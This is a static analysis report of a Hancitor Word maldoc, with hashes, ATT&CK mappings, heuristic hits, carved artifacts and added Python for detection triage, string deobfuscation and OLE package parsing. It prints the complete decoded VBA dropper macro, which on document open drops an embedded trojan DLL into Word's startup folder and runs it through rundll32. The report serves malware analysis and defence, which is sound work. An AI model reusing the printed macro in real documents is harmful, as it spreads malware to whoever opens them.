Hancitor — Office (OOXML) malware analysis

Static analysis result for SHA-256 7fec3b7708197761…

MALICIOUS

Office (OOXML)

Size: 880.4 KB
Created: 2021-03-24 09:23:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-04-01
MD5: 27a24ecffb6986447e24f90a4cbdf55c
SHA-1: e43ed590ada1e5b8983426086c0573479fa30491
SHA-256: 7fec3b77081977614f8603f5ef69272e6bab9b8c615580717e2ce6fe34615eb5
Risk score: 230

Malware Insights

Hancitor · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment
T1218.011 System Binary Proxy Execution: Rundll32 (derived from the macro below: the dropped DLL is launched through rundll32.exe)

The sample is a Word (OOXML) document whose VBA project runs from Document_Open, a common initial-execution technique. The Hancitor identification is ClamAV's signature on the VBA project itself. The second stage is not downloaded: it is carried inside the document as an embedded OLE Package (word/embeddings/oleObject1.bin, Ole10Native payload msals.pumpl, detected as Win.Trojan.Zusy). The macro first checks for <Word startup path>\Static.dll and does nothing if it already exists (function chek). Otherwise it moves the Selection onto the embedded object, copies it and deletes it with TypeBackspace; copying the Package object is what causes Word to write msals.pumpl out under the user's AppData\Local\Temp tree. It then shortens Options.DefaultFilePath(wdStartupPath) from the right until the prefix plus "Local\Temp" is an existing directory (function hhhhh), recurses through that tree with Scripting.FileSystemObject (the CreateObject call, used only for folder enumeration) until Dir finds msals.pumpl, and renames the file with Name ... As to Static.dll in Word's startup folder. Finally ShellExecuteA, declared under the alias Hogo, runs rundll32.exe with the parameter "<startup path>\Static.dll,JAAFKUFELAL". The executable name is assembled from split literals ("r", "u", "nd", "l", "l", "3", "2", ".", "e", "xe"), and the two trailing characters of the DLL name are the first character of the document's first table cell, repeated (functions ks and fuxk), so the command line never appears as one string. No URL or download logic exists in the macro; the addresses listed under Embedded URL are XML namespace declarations.
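
The chain above ends with WINWORD.EXE calling ShellExecuteA to start rundll32.exe on a DLL under the user's profile. As an added example (not part of this report), the following Python triages Sysmon-style process-creation records for that pattern. The records, the scoring weights and the threshold are constructed for illustration; the first record's command line is the one the macro builds, with the assumed default Word startup path.

```python
"""Triage process-creation telemetry for the execution pattern of this maldoc:
Word calling ShellExecuteA to run rundll32.exe on a DLL dropped under the
user's profile, with a bare export name as the only argument."""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Locations a macro can write to without elevation.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(?:appdata|downloads|desktop|documents)\\|\\programdata\\|\\windows\\temp\\",
    re.I)
WORD_STARTUP = re.compile(r"\\microsoft\\word\\startup\\", re.I)

# rundll32 command line: [quoted] exe, [quoted] dll path, optional ",Export".
RUNDLL_ARGS = re.compile(
    r'^\s*"?[^"]*?rundll32(?:\.exe)?"?\s+"?([^",]+)"?\s*(?:,\s*(\S+))?', re.I)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def triage_rundll32(event):
    """Return (score, reasons) for one process-creation event, given as a dict with
    ParentImage, Image and CommandLine (the fields Sysmon event ID 1 provides)."""
    if _basename(event["Image"]) != "rundll32.exe":
        return 0, []
    parent = _basename(event["ParentImage"])
    m = RUNDLL_ARGS.match(event["CommandLine"])
    dll, export = (m.group(1), m.group(2)) if m else ("", None)

    score, reasons = 0, []
    if parent in OFFICE_APPS:
        score += 50
        reasons.append(f"rundll32.exe spawned by Office application {parent}")
    if USER_WRITABLE.search(dll):
        score += 40
        reasons.append(f"DLL loaded from user-writable path: {dll}")
    if WORD_STARTUP.search(dll):
        score += 20
        reasons.append("DLL sits in the Word STARTUP folder")
    # Weak signal on its own: the export name in this sample (JAAFKUFELAL) is a
    # random upper-case string, unlike documented exports such as Control_RunDLL.
    if export and re.fullmatch(r"[A-Z]{8,}", export):
        score += 10
        reasons.append(f"export name looks generated: {export}")
    return score, reasons


def triage(events, threshold=60):
    """Return [(index, score, reasons)] for events scoring at or above threshold."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = triage_rundll32(ev)
        if score >= threshold:
            hits.append((i, score, reasons))
    return hits


# Constructed Sysmon-style records (not from the report). The first is the command
# line the macro builds; the other two are ordinary rundll32 uses for contrast.
EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\MyPc\AppData\Roaming\Microsoft\Word\STARTUP\Static.dll,JAAFKUFELAL"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for i, score, reasons in triage(EVENTS):
        print(f"event {i}: score {score}")
        for r in reasons:
            print(f"  - {r}")
```

The Office-parent check alone would also fire on the third record (a Control Panel applet opened from Word), which is why the path and export checks are needed to separate the sample's behaviour from legitimate rundll32 use.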

Heuristics 7

  • ClamAV: Doc.Dropper.Hancitor-9845854-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Hancitor-9845854-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set fso = CreateObject("Scripting.FileSystemObject")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All of the following were found in document text (OOXML body / shared strings). They are XML namespace URIs that Word writes into the document parts when saving, not network indicators:
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/drawing/2016/ink
    • http://schemas.microsoft.com/office/drawing/2017/model3d
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2016/wordml/cid
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts 6

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5124 bytes
SHA-256: 58be39504cbaedd7e605145e6970ef1e0a074ffc94f1ca5b7abc0bf535b199f3
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

  Private Declare PtrSafe Function Hogo Lib "shell32" _
        Alias "ShellExecuteA" (ByVal hwnd As Long, _
        ByVal lpOperation As String, ByVal lpFile As String, _
        ByVal lpParameters As String, ByVal lpDirectory As String, _
        ByVal nShowCmd As Long) As Long

Private Const SW_SHOWNORMAL = 1

Private Sub Document_Open()
Call stetptwwo
End Sub



Sub stetptwwo()
Dim nvbnf As String
 Dim yy As String

 Dim bcvxz As String
nvbnf = "\Sta" & "tic.d"
Dim vxcv As Integer
Dim hugs As Integer
hugs = chek

Dim ede As String
If hugs = 1 Then
Else
Dim edef As String

Call hhhhh
Dim pafh As String
pafh = iep
 bcvxz = pafh
Dim geto As String
Dim pus As String

geto = "nd"
Dim ter As String

Dim iof As String
iof = "3"
ter = "e"
iof = iof & "2"
Dim hgl As String
Dim jsd As String
jsd = geto
 Dim hh As String
 hh = iof & "." & ter & "xe"
 Dim fps As String
 fps = "r"
Dim laz As String
laz = "l"
 Dim fa As String
 fa = fps & "u" & jsd & "l" & laz & hh


hgl = ks
yy = bcvxz & nvbnf & hgl & hgl & ",JAAFKUFELAL"

  Hogo 0, vbNullString, _
    fa, yy, _
     vbNullString, SW_SHOWNORMAL
End If
End Sub



Attribute VB_Name = "Module1"
  


Function Getme(RootPath As String)
Dim hor As String

Dim fso As Object
Dim fld As Object
Dim vhhs As Object
Dim afs As String
Dim myArr
Dim pafh As String
pafh = iep
hor = pafh
Dim asdf
Dim cheza As String

asdf = RootPath
Dim fer As String

Set fso = CreateObject("Scripting.FileSystemObject")

Set fld = fso.GetFolder(asdf)
Dim uuj As String
uuj = "\msals.pumpl"
strFileExists = Dir(RootPath & uuj)
      If strFileExists = "" Then
    
For Each vhhs In fld.SUBFOLDERS


afs = vhhs
Dim kkl As String

kkl = Application.Run("Getme", vhhs.Path)


Next
    Set vhhs = Nothing
Getme = myArr
Set fld = Nothing
Set fso = Nothing



    Else
    Dim kurlbik As String
    kurlbik = hor
      If Dir(kurlbik & "\" & "Sta" & "tic.d" & "l" & "l") = "" Then
      
       kkl = Application.Run("hi", RootPath)

      Else
      Exit Function
  End If
    
        End If


End Function





Function chek()

Dim jos As String
Dim pafh As String
pafh = iep
jos = pafh

 
 If Dir(jos & "\" & "Sta" & "tic.d" & "l" & "l") = "" Then
 chek = 0
 Else

 chek = 1
 End If
End Function






Function ks()
Dim askl As String
askl = fuxk
ks = Left(askl, 1)
End Function




Sub nm(ololow As String)
Dim pafh As String
pafh = iep
  Name ololow & "\msals.pumpl" As pafh & "\" & "Sta" & "tic.d" & "l" & "l"
End Sub


Attribute VB_Name = "Module2"
Sub hi(myhome As String)
Dim plop As String
Dim pafh As String
pafh = iep
plop = pafh
Dim kkx As String
kkx = Application.Run("jop", myhome, plop & "\" & "Sta" & "tic.d" & "l" & "l")
End Sub


Sub hhhhh()
Dim posl As String
Dim pafh As String
pafh = iep
posl = pafh
Dim ntgs
Dim sda
Call cvbc
    ntgs = 50
sda = 49
Dim jos As String
Dim lsa As String
las = "\Te"
jos = posl
Dim yer As String
yer = "Loc" & "al" & las & "mp"
While sda < 50
      ntgs = ntgs - 1
      
      If Dir(Left(jos, ntgs) & yer, vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   Dim klas As String
   klas = posl
Call Getme(Left(klas, ntgs) & yer)
  Selection.TypeBackspace
   

End Sub











Function lka(ff As String)
lka = ff
End Function






Attribute VB_Name = "Module3"



Function iep()
iep = Options.DefaultFilePath(wdStartupPath)
End Function





Attribute VB_Name = "Module4"


Sub checkthe(sf As String)

Dim pafh As String
pafh = iep

Dim ololow As String
ololow = sf
Dim nothings As String
nothings = 2

    If Dir(sf & "\msals.pumpl") = "" Then
    
    Else
         If Dir(nothings) = "" Then

        Call nm(ololow)
    Else
   Exit Sub
    End If
  
    End If
End Sub





Sub jop(uuu As String, aaaa As String)

Call rnee(uuu, aaaa)
End Sub



Sub bcvxzc()
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=23
    Selection.MoveRight Unit:=wdCharacter, Count:=51
       Selection.TypeBackspace
Call asfa
End Sub



Sub cvbc()
Selection.MoveDown Unit:=wdLine, Count:=1
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=23
    Selection.MoveRight Unit:=wdCharacter, Count:=51
 Selection.MoveDown Unit:=wdLine, Count:=23
Call bcvxzc
End Sub


Sub asfa()
   Selection.Copy
End Sub







Attribute VB_Name = "Module5"


Sub rnee(myhome As String, hsa As String)

Name myhome & "\msals.pu" & "mpl" As hsa
End Sub





Function fuxk()
fuxk = ThisDocument.Tables(1).Cell(1, 1).Range.Text
End Function
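
Added example, not part of the report or of the sample: a small constant folder for the split string literals used in stetptwwo above, to recover the ShellExecuteA arguments without running the macro. The two run-time values are supplied as assumptions: iep (Options.DefaultFilePath(wdStartupPath)) is given a typical startup path, and ks (the first character of the document's first table cell, which the report does not show) is given "l", the letter the other modules spell out in "Sta" & "tic.d" & "l" & "l".

```python
"""Constant-fold the split string literals in the Hancitor macro to recover
the lpFile and lpParameters values passed to ShellExecuteA (alias Hogo)."""
import re

# Assignment statements copied from ThisDocument.stetptwwo in the listing above,
# stripped of Dim declarations and control flow.
STETPTWWO = r'''
nvbnf = "\Sta" & "tic.d"
pafh = iep
bcvxz = pafh
geto = "nd"
iof = "3"
ter = "e"
iof = iof & "2"
jsd = geto
hh = iof & "." & ter & "xe"
fps = "r"
laz = "l"
fa = fps & "u" & jsd & "l" & laz & hh
hgl = ks
yy = bcvxz & nvbnf & hgl & hgl & ",JAAFKUFELAL"
'''

# A VBA string literal ("" inside is an escaped quote) or a bare identifier;
# the & operators between them are simply skipped.
TOKEN = re.compile(r'"((?:[^"]|"")*)"|([A-Za-z_]\w*)')
ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')


def fold_vba_strings(src, env):
    """Walk `name = a & "b" & c` statements in order, resolving identifiers from env.

    env seeds the values of anything the macro only obtains at run time (here the
    functions iep and ks); every assignment extends env so later lines can use it.
    An identifier that is neither seeded nor assigned earlier raises KeyError.
    """
    env = dict(env)
    for line in src.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        name, expr = m.group(1), m.group(2)
        parts = []
        for lit, ident in TOKEN.findall(expr):
            if ident:
                if ident not in env:
                    raise KeyError(f"{ident} is not a string known at this point")
                parts.append(env[ident])
            else:
                parts.append(lit.replace('""', '"'))
        env[name] = "".join(parts)
    return env


def recover_command(startup_path, table_first_char="l"):
    """Return (lpFile, lpParameters) as Document_Open hands them to ShellExecuteA.

    startup_path stands in for Options.DefaultFilePath(wdStartupPath) (function
    iep).  table_first_char stands in for Left(ThisDocument.Tables(1).Cell(1, 1)
    .Range.Text, 1) (function ks); the cell is not in the report, so "l" is an
    assumption, chosen because Module1, Module2 and Module4 all build the same
    file name as "Sta" & "tic.d" & "l" & "l".
    """
    env = fold_vba_strings(STETPTWWO, {"iep": startup_path, "ks": table_first_char})
    return env["fa"], env["yy"]


if __name__ == "__main__":
    # Assumed default per-user Word startup folder.
    exe, args = recover_command(r"C:\Users\MyPc\AppData\Roaming\Microsoft\Word\STARTUP")
    print(exe, args)
```

The same folder resolves the file-name fragments in chek, nm, hi and checkthe; only stetptwwo is fed in because it is the one routine whose result reaches a Win32 call.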

ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject1.bin 551424 bytes
SHA-256: 713196928f6561476712c865bd3018812394b95b8e749bb2417e4a8752c8c558
Detection
ClamAV: Win.Trojan.Zusy-9861402-0
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_STR_VIRTUALALLOC, SC_STR_LOADLIBRARY, SC_GETPC_CALL Static shellcode analysis recovered API/import strings: LoadLibraryExA, VirtualAlloc, GetProcAddress, ExitProcess
ooxml_oleobject_00_ole10native_00.bin ole-package OOXML word/embeddings/oleObject1.bin Ole10Native stream: Ole10Native 538957 bytes
SHA-256: cd80b2a74f74ba1c34fd11ddcead61d0cde39dcae991478b5c683daef15a8ce1
Detection
ClamAV: Win.Trojan.Zusy-9861402-0
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_STR_VIRTUALALLOC, SC_STR_LOADLIBRARY, SC_GETPC_CALL Static shellcode analysis recovered API/import strings: LoadLibraryExA, VirtualAlloc, GetProcAddress, ExitProcess
ooxml_oleobject_00_ole10native_00_msals.pumpl ole-package-payload OOXML word/embeddings/oleObject1.bin Ole10Native payload: display_name=msals.pumpl; full_path=C:\Users\MyPc\AppData\Local\Temp\msals.pumpl; temp_path=; def_file= 538624 bytes
SHA-256: d99f202394df333f2626385c1af6a3d31926a1824206580d304de1f2facfcb07
Detection
ClamAV: Win.Trojan.Zusy-9861402-0
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_STR_VIRTUALALLOC, SC_STR_LOADLIBRARY, SC_GETPC_CALL. Recovered API/import strings: LoadLibraryExA, VirtualAlloc, GetProcAddress, ExitProcess. Caveat: this is the file the macro renames to Static.dll and hands to rundll32.exe, so it is a PE, and LoadLibraryExA, VirtualAlloc and GetProcAddress are the usual minimal import set of a packed or self-loading PE stub; treat the shellcode indicators as corroborating the ClamAV hit rather than as a finding on their own.
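To get at the 538624-byte payload yourself rather than relying on the extractor's carve, the Ole10Native stream inside word/embeddings/oleObject1.bin has to be parsed. Added example, not the report's extractor code: a parser for that stream layout as read by oletools' OleNativeStream, run here against a constructed stream that reuses the report's label and drop path but carries a 64-byte dummy DLL instead of the real Zusy/Hancitor payload. On the real part, the stream is obtained with olefile as noted in the comment.

```python
"""Parse an Ole10Native (OLE Package) stream and pull out the file it carries."""
import hashlib
import struct


def _cstring(buf, off):
    """Read a NUL-terminated ANSI string starting at off; return (text, next_offset)."""
    end = buf.index(b"\x00", off)
    return buf[off:end].decode("latin-1"), end + 1


def parse_ole10native(stream):
    """Return metadata and payload of an Ole10Native stream.

    Layout, as oletools' OleNativeStream reads it: u32 size of everything that
    follows, u16 flags, label NUL, source path NUL, 8 bytes (usually zero),
    temp path NUL, u32 payload size, payload bytes.  The report's extractor
    printed exactly these fields (display_name, full_path, temp_path).
    """
    total_size, flags = struct.unpack_from("<IH", stream, 0)
    if total_size + 4 > len(stream):
        raise ValueError("declared size exceeds stream length")
    off = 6
    label, off = _cstring(stream, off)
    src_path, off = _cstring(stream, off)
    off += 8
    temp_path, off = _cstring(stream, off)
    (payload_size,) = struct.unpack_from("<I", stream, off)
    off += 4
    payload = stream[off:off + payload_size]
    if len(payload) != payload_size:
        raise ValueError("payload truncated")
    return {
        "flags": flags,
        "label": label,
        "src_path": src_path,
        "temp_path": temp_path,
        "payload": payload,
        "sha256": hashlib.sha256(payload).hexdigest(),
        "is_pe": payload[:2] == b"MZ",
    }


def build_ole10native(label, src_path, payload, temp_path=""):
    """Assemble a stream in the same layout (used here only to construct test input)."""
    body = struct.pack("<H", 2)                       # flags: embedded
    body += label.encode("latin-1") + b"\x00"
    body += src_path.encode("latin-1") + b"\x00"
    body += b"\x00" * 8
    body += temp_path.encode("latin-1") + b"\x00"
    body += struct.pack("<I", len(payload)) + payload
    return struct.pack("<I", len(body)) + body


# Constructed stand-in for the \x01Ole10Native stream of oleObject1.bin: same
# label and drop path as the report, but a dummy 64-byte "DLL" as payload.
FAKE_DLL = b"MZ" + b"\x90" * 62
SAMPLE_STREAM = build_ole10native(
    "msals.pumpl", r"C:\Users\MyPc\AppData\Local\Temp\msals.pumpl", FAKE_DLL)

if __name__ == "__main__":
    # For the real part (assumed path), replace SAMPLE_STREAM with:
    #   import olefile
    #   olefile.OleFileIO("oleObject1.bin").openstream("\x01Ole10Native").read()
    info = parse_ole10native(SAMPLE_STREAM)
    for key in ("label", "src_path", "temp_path", "is_pe", "sha256"):
        print(f"{key}: {info[key]}")
```

Run against the real stream, the payload's SHA-256 should reproduce the d99f2023… value listed for msals.pumpl above; a mismatch means the stream was carved differently (the size check guards against a truncated carve).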
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 40960 bytes
SHA-256: 69ed4da399ea6459079d38bbb1d377f3c9bebe92867a46a00013c957e4619d31
Detection
ClamAV: Doc.Dropper.Hancitor-9845854-0
Obfuscation or payload: unlikely
emf_00.emf ooxml-emf OOXML EMF part: word/media/image2.emf 5000 bytes
SHA-256: 01840a548891d54182f3d161a568eee55966e2729c110ae9fff8f9d48b1688d5